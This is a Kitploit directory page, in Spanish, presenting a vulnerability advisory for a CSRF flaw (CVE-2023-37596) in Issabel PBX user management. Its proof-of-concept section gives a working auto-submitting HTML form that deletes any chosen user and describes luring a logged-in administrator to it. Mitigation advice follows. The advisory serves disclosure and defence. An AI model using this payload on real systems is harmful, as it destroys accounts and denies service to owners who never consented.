Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-37596 — CVE-2023-37596 es una vulnerabilidad de Cross-Site Request Forgery (CSRF) descubierta en Issabel PBX versión 4.0.0-6, una plataforma de Comunicaciones Unificadas de código abierto ampliamente utilizada. | Kitploit
Herramientas/GitHubGitHub/sahiloj/cve-2023-37596
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubsahiloj/cve-2023-37596

CVE-2023-37596

CVE-2023-37596 es una vulnerabilidad de Cross-Site Request Forgery (CSRF) descubierta en Issabel PBX versión 4.0.0-6, una plataforma de Comunicaciones Unificadas de código abierto ampliamente utilizada.

Ver Repositorio
11hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-37596 — issabel-pbx 4.0.0-6: Cross-Site Request Forgery (CSRF) — Eliminar Cualquier Usuario

Severidad: Alta  |  CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H)  |  CWE: CWE-352


Tabla de Contenidos

  • Resumen
  • Detalles de la Vulnerabilidad
  • Impacto
  • Versión Afectada
  • Escenario de Ataque
  • Prueba de Concepto (Pasos para Reproducir)
  • Mitigación / Corrección
  • Referencias
  • Cronología de Divulgación
  • Autor

Resumen

Se descubrió una vulnerabilidad de Cross-Site Request Forgery (CSRF) en Issabel PBX versión 4.0.0-6. El endpoint de gestión de usuarios no implementa ninguna protección CSRF, lo que permite a un atacante remoto no autenticado crear una página web maliciosa que — al ser visitada por un administrador de Issabel autenticado — elimine silenciosamente cualquier cuenta de usuario del sistema. La explotación repetida puede volver toda la aplicación inaccesible al eliminar todos los usuarios administrativos.


Detalles de la Vulnerabilidad


Impacto

Debido a que Issabel PBX no valida el origen de las solicitudes que cambian el estado en su interfaz de gestión de usuarios, un ataque CSRF exitoso permite a un atacante:

  • Eliminar cualquier cuenta de usuario — incluido el administrador principal — sin que la víctima lo sepa.
  • Causar una Denegación de Servicio (DoS) — al eliminar todos los usuarios, nadie puede iniciar sesión, volviendo el panel de administración de PBX completamente inaccesible.
  • Interrumpir los servicios de telefonía — la configuración y gestión del sistema telefónico deja de estar disponible hasta que la cuenta se recupere manualmente a nivel del servidor.

Versión Afectada

ProductoVersión AfectadaEstado
issabel-pbx4.0.0-6Vulnerable

Escenario de Ataque

Un atacante aloja una página HTML maliciosa que contiene una solicitud HTTP falsificada dirigida al endpoint de eliminación de usuarios de la aplicación Issabel PBX. El ataque se desencadena automáticamente (o al hacer clic en un botón) cuando un usuario que ya está autenticado en Issabel visita la página maliciosa en el mismo navegador. Debido a que el navegador incluye automáticamente las cookies de sesión de la víctima en cada solicitud, el servidor acepta la solicitud de eliminación falsificada como legítima.

No se requieren privilegios especiales por parte del atacante — solo un vector de ingeniería social (enlace de phishing, anuncio malicioso, etc.) para atraer al administrador autenticado a la página creada.

Características clave de este ataque:

  • No se requiere autenticación por parte del atacante.
  • Un solo clic (o incluso cero clics si se usan `` / formularios de envío automático) es suficiente para desencadenar la explotación.
  • Cualquier ID de usuario (por ejemplo, id=1, id=2, …) puede ser objetivo modificando el payload.
  • El ataque es invisible para la víctima; la página puede mostrar contenido no relacionado mientras envía silenciosamente la solicitud falsificada.

Prueba de Concepto (Pasos para Reproducir)

Prerrequisitos

  • Burp Suite (Community o Professional)
  • Un navegador configurado para enviar tráfico a través de Burp Suite
  • Una instancia de Issabel PBX 4.0.0-6 accesible en la red

Paso 1 — Iniciar sesión como Administrador

Navegue a la página de lista de usuarios de Issabel PBX e identifíquese con credenciales de administrador:

root@kitploit:~
https://<Issabel-IP>/index.php?menu=userlist

Paso 1 — Lista de usuarios de Issabel PBX


Paso 2 — Capturar la Solicitud de Eliminación de Usuario en Burp Suite

  1. Con el proxy de Burp Suite activo, haga clic en el botón Eliminar junto al usuario objetivo.
  2. En Proxy → Historial HTTP de Burp Suite, localice la solicitud DELETE/POST capturada.
  3. Haga clic derecho en la solicitud y seleccione Engagement Tools → Generate CSRF PoC.

Paso 2 — Captura de la solicitud de eliminación en Burp Suite


Paso 3 — Generar y Guardar el Exploit CSRF

Burp Suite producirá una página HTML similar a la siguiente. Guárdela como un archivo .html (por ejemplo, csrf_exploit.html):

root@kitploit:~
<html>
  <!-- CSRF PoC - generado por Burp Suite Professional -->
  <body>
    <form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Enviar solicitud" />
    </form>
    <script>
      // Auto-enviar el formulario tan pronto como la página cargue
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Nota: Reemplace <Issabel-IP> con la dirección IP o nombre de host del servidor objetivo, y ajuste el valor de id para dirigirse a una cuenta de usuario diferente.


Paso 4 — Entregar el Exploit al Administrador Autenticado

Envíe el archivo csrf_exploit.html (o un enlace a donde esté alojado) a un usuario que se encuentre actualmente conectado a Issabel PBX. Cuando la víctima abra la página, el formulario se enviará automáticamente y el usuario objetivo será eliminado sin ninguna solicitud de confirmación.

Paso 4 — Exploit CSRF ejecutado, usuario eliminado

Paso 4 — Confirmación de que el usuario ha sido eliminado


Mitigación / Corrección

Las siguientes defensas deberían ser aplicadas por el proveedor y/o por los administradores del sistema para corregir esta vulnerabilidad:

  1. Implementar Tokens CSRF — Generar un token criptográficamente aleatorio, por sesión (o por solicitud) y validarlo del lado del servidor para cada solicitud que cambie el estado. Las solicitudes que no incluyan un token válido deben ser rechazadas.

  2. Atributo de Cookie SameSite — Establecer el atributo SameSite de la cookie de sesión en Strict o Lax para evitar que las solicitudes de origen cruzado envíen la cookie de sesión en la mayoría de los navegadores.

  3. Verificar el Encabezado Origin / Referer — En el lado del servidor, rechazar cualquier solicitud que cambie el estado cuyo encabezado Origin o Referer no coincida con el dominio de la aplicación.

  4. Requerir Re-autenticación para Acciones Destructivas — Solicitar al usuario que vuelva a ingresar su contraseña antes de procesar acciones irreversibles como la eliminación de cuentas de usuario.

  5. Aplicar el Principio de Menor Privilegio — Asegurar que solo los usuarios con un rol de administrador explícito puedan acceder a la funcionalidad de eliminación de usuarios, reduciendo el radio de explosión de un ataque exitoso.

Hasta que haya un parche del proveedor, se recomienda a los administradores:

  • Restringir el acceso al panel de administración de Issabel PBX a direcciones IP confiables mediante reglas de firewall.
  • Evitar navegar por sitios web no confiables mientras estén conectados al panel de administración.

Referencias

  • NVD — CVE-2023-37596
  • OWASP — Cross-Site Request Forgery (CSRF)
  • CWE-352: Cross-Site Request Forgery (CSRF)
  • Sitio Oficial de Issabel PBX
  • IssabelFoundation/issabelPBX en GitHub
  • PortSwigger — CSRF

Cronología de Divulgación

FechaEvento
10/07/2023Vulnerabilidad descubierta y reportada
10/07/2023CVE-2023-37596 asignado

Autor

Sahil Ojha

  • Investigador de Seguridad
  • CVE: CVE-2023-37596

Descargo de responsabilidad: Este repositorio se publica únicamente con fines educativos y de divulgación responsable. La información aquí proporcionada no debe ser utilizada para atacar sistemas sin el permiso explícito por escrito del propietario del sistema. El autor no asume ninguna responsabilidad por el mal uso de esta información.

Descargar herramienta
CampoValor
ID CVECVE-2023-37596
Tipo de VulnerabilidadCross-Site Request Forgery (CSRF)
CWECWE-352
ProductoIssabel PBX
Versión Vulnerable4.0.0-6
Página del Proveedorhttps://www.issabel.org/
Repositorio del Softwarehttps://github.com/IssabelFoundation/issabelPBX
Probado enWindows
CVE Publicado10/07/2023
Descubierto porSahil Ojha